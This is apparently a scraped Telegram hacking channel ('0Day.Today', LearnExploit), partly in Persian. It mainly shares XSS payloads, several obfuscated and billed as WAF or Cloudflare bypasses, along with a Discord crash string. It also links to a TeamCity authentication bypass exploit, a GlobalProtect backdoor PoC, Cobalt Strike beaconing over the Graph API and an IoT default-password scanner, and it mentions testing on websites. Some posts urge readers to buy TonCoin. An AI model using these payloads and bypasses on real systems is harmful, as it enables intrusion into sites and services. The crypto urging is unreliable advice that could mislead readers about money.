TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass
LearnBox:
1_Exploits
2_Video
#CVE #Bug #Authentication #Bypass
➖➖➖➖➖➖➖
📣 T.me/LearnExploit
📣 T.me/BugCod3
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass
LearnBox:
1_Exploits
2_Video
#CVE #Bug #Authentication #Bypass
➖➖➖➖➖➖➖
📣 T.me/LearnExploit
📣 T.me/BugCod3
👍8🔥6👎3
ری اکشن خوب بگیره اکسپلویتشو گسترش میدم :00
👍12👎6🫡2❤1🆒1
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#Payload #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3❤2⚡1❤🔥1
Ty for 900 member
یه هوله ۱۰۰ تاییمون نشه ؟ 😅
یه هوله ۱۰۰ تاییمون نشه ؟ 😅
CVE-2024-26630
Linux 6.5 Kernel Pointer Leak ❗️
Link
#Cve #linux #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Linux 6.5 Kernel Pointer Leak ❗️
Link
#Cve #linux #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2⚡1
0Day.Today | Learn Exploit | Zero World | Dark web |
15k beshim ye chi bad sammi darim guys 🤫🔥 When we reach 15k, we will publish something awesome (autoexploiter 2024 method).
نتیجه ی تستش حالا یه چند تا تستی وبسایت ادد زدم .
The result of the test. Now I have done a few tests on the website
The result of the test. Now I have done a few tests on the website
🔥12✍1👨💻1🫡1
this string crashes discord 🤕
#trick #discord
——————
0Day.Today
@LearnExploit
@Tech_Army
http://./\<#0>: ://./<#0>#trick #discord
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4⚡1❤1🆒1
⚡2👍1
Genzai helps you identify IoT or Internet of Things related dashboards across a single or set of targets provided as an input and furthermore scan them for default password issues and potential vulnerabilities based on paths and versions.
LearnExploit#GO #iot #Security #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡3🔥3👍1
Nice collection of XSS filters bypasses 💎
Github
#Bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
❤3👍2❤🔥1
XSS payload ⚡️
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )<a href=[�]"� onmouseover=prompt(1)//">XYZ</a><script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg><script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍3❤1
قیمت Ton هم شده 7 دلار 🔥
قیمت هر 10 میلیون نات کوینم فاکینگ رفته بود رو 100 دلار 😵💎
پیشنهادم اینه حداقل برای خودتون مقداریم شده TonCoin بخرید❗️
——————
0Day.Today
@LearnExploit
@Tech_Army
قیمت هر 10 میلیون نات کوینم فاکینگ رفته بود رو 100 دلار 😵💎
پیشنهادم اینه حداقل برای خودتون مقداریم شده TonCoin بخرید❗️
——————
0Day.Today
@LearnExploit
@Tech_Army
👍2
پاول دورف اعلام کرده که تعداد کاربران فعال تلگرام از مرز ۹۰۰ میلیون کاربر در ماه عبور کرده و این اپ ۶امین اپ پراستفاده و پردانلود در جهان هست.
درامدهای تلگرام در فصل اول ۲۰۲۴ از هزینه هاش فراتر رفته و به گفته دورف این اپ امسال به سوددهی میرسه.
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
درامدهای تلگرام در فصل اول ۲۰۲۴ از هزینه هاش فراتر رفته و به گفته دورف این اپ امسال به سوددهی میرسه.
#News
——————
0Day.Today
@LearnExploit
@Tech_Army
UPSTYLE backdoor targeting GlobalProtect VPN devices via CVE-2024-3400 in 3 images/stages 🔥
Github
#poc #backdoor #0day
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#poc #backdoor #0day
——————
0Day.Today
@LearnExploit
@Tech_Army
GraphStrike: Cobalt Strike HTTPS beaconing over Microsoft Graph API
Link
#cobalt_strike #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#cobalt_strike #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👍1
XSS Tip 🥵
If alert() is being converted to ALERT() and you can use
Like onerror="
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
#XSS #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
If alert() is being converted to ALERT() and you can use
Like onerror="
𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"
#XSS #tip
——————
0Day.Today
@LearnExploit
@Tech_Army
❤3❤🔥3🔥2